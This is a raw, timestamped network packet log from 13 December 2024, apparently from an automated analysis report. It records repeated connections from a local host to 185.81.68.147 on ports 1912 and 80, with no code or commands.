                                                                                                                                                                                                Dec 13, 2024 08:19:17.966100931 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.279128075 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.287580013 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:18.407325983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.720294952 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.762362957 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:18.801373959 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:18.837704897 CET8049798185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.837718964 CET8049798185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.837826967 CET4979880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:18.839122057 CET4979880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:18.921078920 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:18.949929953 CET4980480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:18.960302114 CET8049798185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:19.069654942 CET8049804185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:19.071181059 CET4980480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:19.071274996 CET4980480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:19.191085100 CET8049804185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:19.191257954 CET4980480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:19.233899117 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:19.276865005 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:19.310956955 CET8049804185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:19.998470068 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.118268013 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.431416035 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.481370926 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.489300966 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609119892 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609143972 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609189987 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609261990 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609327078 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609337091 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609441042 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609450102 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609520912 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609529972 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609584093 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609734058 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609743118 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.609750986 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.711608887 CET8049804185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.711700916 CET8049804185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.711751938 CET4980480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.713143110 CET4980480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.825047970 CET4981080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.832914114 CET8049804185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.944873095 CET8049810185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:20.944960117 CET4981080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:20.945025921 CET4981080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:21.042438030 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:21.064744949 CET8049810185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:21.064807892 CET4981080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:21.072324038 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:21.184504986 CET8049810185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:21.192233086 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:21.507060051 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:21.558806896 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:21.938658953 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.058471918 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.371114969 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.382675886 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.502454042 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.541472912 CET8049810185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.541733027 CET8049810185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.544760942 CET4981080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.561330080 CET4981080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.678606033 CET4981280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.681078911 CET8049810185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.799135923 CET8049812185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.803415060 CET4981280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.806682110 CET4981280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.815200090 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.819111109 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.927882910 CET8049812185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:22.927994967 CET4981280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:22.939969063 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:23.047997952 CET8049812185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:23.251365900 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:23.252377987 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:23.373127937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:23.686299086 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:23.725939035 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.422614098 CET8049812185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:24.422801018 CET8049812185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:24.422935963 CET4981280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.424361944 CET4981280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.528006077 CET4981880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.544075966 CET8049812185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:24.649635077 CET8049818185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:24.649751902 CET4981880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.650079966 CET4981880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.769846916 CET8049818185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:24.769917011 CET4981880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:24.889615059 CET8049818185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:26.106290102 CET8049818185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:26.106524944 CET8049818185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:26.106743097 CET4981880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:26.108011961 CET4981880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:26.215795994 CET4982380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:26.227770090 CET8049818185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:26.335606098 CET8049823185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:26.335696936 CET4982380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:26.335807085 CET4982380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:26.455466986 CET8049823185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:26.455518961 CET4982380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:26.576221943 CET8049823185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:27.946985960 CET8049823185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:27.947197914 CET8049823185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:27.947804928 CET4982380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:27.948932886 CET4982380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:28.059361935 CET4982980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:28.068628073 CET8049823185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:28.179217100 CET8049829185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:28.179323912 CET4982980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:28.179421902 CET4982980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:28.299227953 CET8049829185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:28.299335003 CET4982980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:28.419003010 CET8049829185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:29.788844109 CET8049829185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:29.788927078 CET8049829185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:29.789047956 CET4982980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:29.790365934 CET4982980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:29.903059959 CET4983580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:29.910063028 CET8049829185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:30.022907019 CET8049835185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:30.023072958 CET4983580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:30.023195028 CET4983580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:30.142930031 CET8049835185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:30.143069983 CET4983580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:30.262890100 CET8049835185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:31.467072964 CET8049835185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:31.467201948 CET8049835185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:31.467261076 CET4983580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:31.468539000 CET4983580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:31.575025082 CET4983780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:31.588202000 CET8049835185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:31.694751978 CET8049837185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:31.696775913 CET4983780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:31.696876049 CET4983780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:31.816575050 CET8049837185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:31.816808939 CET4983780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:31.936638117 CET8049837185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:33.167763948 CET8049837185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:33.167891979 CET8049837185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:33.167973995 CET4983780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:33.179428101 CET4983780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:33.299216986 CET8049837185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:33.328677893 CET4984380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:33.448573112 CET8049843185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:33.448677063 CET4984380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:33.448724031 CET4984380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:33.568497896 CET8049843185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:33.568599939 CET4984380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:33.688815117 CET8049843185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:34.928484917 CET8049843185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:34.928795099 CET8049843185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:34.928888083 CET4984380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:34.930238008 CET4984380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:35.044517040 CET4984880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:35.050030947 CET8049843185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:35.164762974 CET8049848185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:35.164843082 CET4984880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:35.164915085 CET4984880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:35.285015106 CET8049848185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:35.285150051 CET4984880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:35.405072927 CET8049848185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:36.796763897 CET8049848185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:36.796883106 CET8049848185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:36.796932936 CET4984880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:36.798372030 CET4984880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:36.903048038 CET4985480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:36.954547882 CET8049848185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:37.195245981 CET8049854185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:37.195338011 CET4985480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:37.195400953 CET4985480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:37.315694094 CET8049854185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:37.315805912 CET4985480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:37.435564995 CET8049854185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:38.826874971 CET8049854185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:38.826910019 CET8049854185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:38.827014923 CET4985480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:38.832920074 CET4985480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:38.948185921 CET4986180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:38.952755928 CET8049854185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:39.069883108 CET8049861185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:39.069984913 CET4986180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:39.073646069 CET4986180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:39.193418026 CET8049861185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:39.193479061 CET4986180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:39.313374996 CET8049861185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:40.733407021 CET8049861185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:40.733479977 CET8049861185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:40.733552933 CET4986180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:40.734878063 CET4986180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:40.840545893 CET4986780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:40.855391979 CET8049861185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:40.960329056 CET8049867185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:40.960455894 CET4986780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:40.960555077 CET4986780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:41.080746889 CET8049867185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:41.080892086 CET4986780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:41.201366901 CET8049867185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:42.574011087 CET8049867185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:42.574026108 CET8049867185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:42.574096918 CET4986780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:42.575542927 CET4986780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:42.684442997 CET4987380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:42.695256948 CET8049867185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:42.804275990 CET8049873185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:42.804361105 CET4987380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:42.804467916 CET4987380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:42.924231052 CET8049873185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:42.924310923 CET4987380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:43.044495106 CET8049873185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:44.261926889 CET8049873185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:44.262048960 CET8049873185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:44.262221098 CET4987380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:44.263308048 CET4987380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:44.372117996 CET4987580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:44.383095980 CET8049873185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:44.492065907 CET8049875185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:44.492840052 CET4987580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:44.494002104 CET4987580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:44.613743067 CET8049875185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:44.615000963 CET4987580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:44.734663963 CET8049875185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:46.104569912 CET8049875185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:46.104589939 CET8049875185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:46.104650974 CET4987580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:46.106302977 CET4987580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:46.215707064 CET4988080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:46.226123095 CET8049875185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:46.335551977 CET8049880185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:46.335675955 CET4988080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:46.335777044 CET4988080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:46.455498934 CET8049880185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:46.455569983 CET4988080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:46.575292110 CET8049880185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:47.786043882 CET8049880185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:47.786091089 CET8049880185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:47.786144972 CET4988080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:47.791189909 CET4988080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:47.910912991 CET8049880185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:47.941123009 CET4988680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:48.060946941 CET8049886185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:48.061039925 CET4988680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:48.061122894 CET4988680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:48.180798054 CET8049886185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:48.180886984 CET4988680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:48.300586939 CET8049886185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:49.698792934 CET8049886185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:49.698834896 CET8049886185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:49.698986053 CET4988680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:49.700685024 CET4988680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:49.809273005 CET4989280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:49.820404053 CET8049886185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:49.929083109 CET8049892185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:49.929172039 CET4989280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:49.929240942 CET4989280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:50.048922062 CET8049892185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:50.049201012 CET4989280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:50.169018030 CET8049892185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:51.539170980 CET8049892185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:51.539304972 CET8049892185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:51.539700985 CET4989280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:51.540731907 CET4989280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:51.652961969 CET4989880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:51.660666943 CET8049892185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:51.772944927 CET8049898185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:51.773051977 CET4989880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:51.773179054 CET4989880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:51.892890930 CET8049898185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:51.893001080 CET4989880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:52.012833118 CET8049898185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:53.417124033 CET8049898185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:53.417222977 CET8049898185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:53.417501926 CET4989880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:53.418715954 CET4989880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:53.528064013 CET4990480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:53.538362026 CET8049898185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:53.647938967 CET8049904185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:53.650888920 CET4990480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:53.650963068 CET4990480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:53.770639896 CET8049904185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:53.770747900 CET4990480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:53.890813112 CET8049904185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:55.098115921 CET8049904185.81.68.147192.168.2.11
